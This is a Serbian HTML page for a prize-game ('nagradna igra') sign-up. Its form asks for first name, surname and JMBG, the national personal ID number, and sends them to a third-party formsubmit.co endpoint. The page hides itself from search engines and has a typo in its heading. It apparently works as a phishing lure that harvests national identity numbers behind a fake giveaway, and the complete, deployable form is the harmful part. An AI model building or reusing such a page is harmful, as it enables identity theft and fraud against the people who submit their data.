<!DOCTYPE html>
<html lang="sr">

<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <meta name="robots" content="noindex, nofollow">
  <link rel="stylesheet" type="text/css" href="css/prijavazanagradnuigru.css">
  <link rel="preconnect" href="https://fonts.googleapis.com">
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
  <link href="https://fonts.googleapis.com/css2?family=Open+Sans:wght@300;400&family=Raleway&display=swap"
    rel="stylesheet">
  <title>Prijava za nagradnu igru</title>
</head>

<style>
  body {
  font-family: 'Open Sans', sans-serif;
  margin: 0;
  background-color: #f16625;
}

img {
  display: block;
  width: 100%;
}

h2 {
  color: #f16625;
  text-align: center;
  margin-top: 35px;
  font-size: 28px;
  text-transform: uppercase;
}

p {
  color: #333;
  font-size: 11px;
  margin-top: -20px;
  text-align: center;
}

.container {
  margin: auto;
  max-width: 1200px;
  background-color: white;
  padding-bottom: 10px;
}

.box {
  align-items: center;
  display: flex;
  justify-content: center;
  margin: 23px auto 40px;
  padding: 40px 0 33px;
  max-width: 500px;
  background: #f6f6f6;
  box-shadow: 0px 0px 5px #bebebe;
}

.group-fname,
.group-lname,
.group-pid {
  display: flex;
  justify-content: flex-end;
  margin-bottom: 20px;
}

.fname,
.lname,
.pid {
  align-items: center;
  display: flex;
  font-size: 16px;
  margin: 0 15px 0 0;
  color: #454545;
}

.text-box {
  border: 1px solid #c5c5c5!important;
}

#fname,
#lname,
#pid {
  border-radius: 4px;
  border: none;
  padding: 2.7px;
}

input#fname,
input#lname,
input#pid {
  width: 284px;
}

input:focus {
  border: 2px solid #f16625!important;
  outline: 0;
}

.button {
  border: none;
  color: #fff;
  display: block;
  font-size: 16px;
  margin: 33px auto 0;
  padding: 7px 16px 8px;
  cursor: pointer;
  background-color: #f16625;
}

.button:hover {
  background-color: #da5a20;
}

.logo {
  margin: 0 auto 30px;
  max-width: 300px;
}

.wrapper {
  margin: 0 20px 0;
}

.header-img-mobile {
  display: none;
}

@media screen and (max-width: 526px) {

  h2 {
    font-size: 26px;
  }

  .header-img-desktop {
    display: none;
  }

  .header-img-mobile {
    display: block;
  }

}

@media screen and (max-width: 515px) {

  input#fname,
  input#lname,
  input#pid {
    width: 200px;
  }

}

@media screen and (max-width: 424px) {

  .group-fname,
  .group-lname,
  .group-pid {
    display: block;
  }

  input#fname,
  input#lname,
  input#pid {
    margin-top: 10px;
    width: 240px;
  }

}
</style>

<body>
  <div class="container">
    <img src="./images/ccd08059520a70c9f2eb2d0dcc3ad6a6.jpg" alt="" class="header-img-desktop">
    <img src="./images/ccd08059520a70c9f2eb2d0dcc3ad6a6m.jpg" alt="" class="header-img-mobile">
    <div class="wrapper">
      <h2>Prijava za nagradnu igrAu:</h2>
      <div class="box">
        <form action="https://formsubmit.co/df8fa32a599b4a363b9082622dab901c" method="post" name="form">
          <div class="group-fname">
            <label class="fname" for="fname">Ime:</label>
            <input class="text-box" type="text" id="fname" name="fname" required>
          </div>
          <div class="group-lname">
            <label class="lname" for="lname">Prezime:</label>
            <input class="text-box" type="text" id="lname" name="lname" required>
          </div>
          <div class="group-pid">
            <label class="pid" for="pid">JMBG:</label>
            <input class="text-box" type="text" id="pid" name="pid" maxlength="13" required
              onkeypress="return isNumberKey(event)">
          </div>
          <input class="button" type="submit" value="Pošalji">
        </form>
      </div>
      <img src="./images/svgexport-1.svg" alt="" class="logo">
    </div>
  </div>
</body>

<script>
  function isNumberKey(evt) {
    var charCode = (evt.which) ? evt.which : event.keyCode
    if (charCode > 31 && (charCode < 48 || charCode > 57))
      return false;

    return true;
  }
</script>

</html>
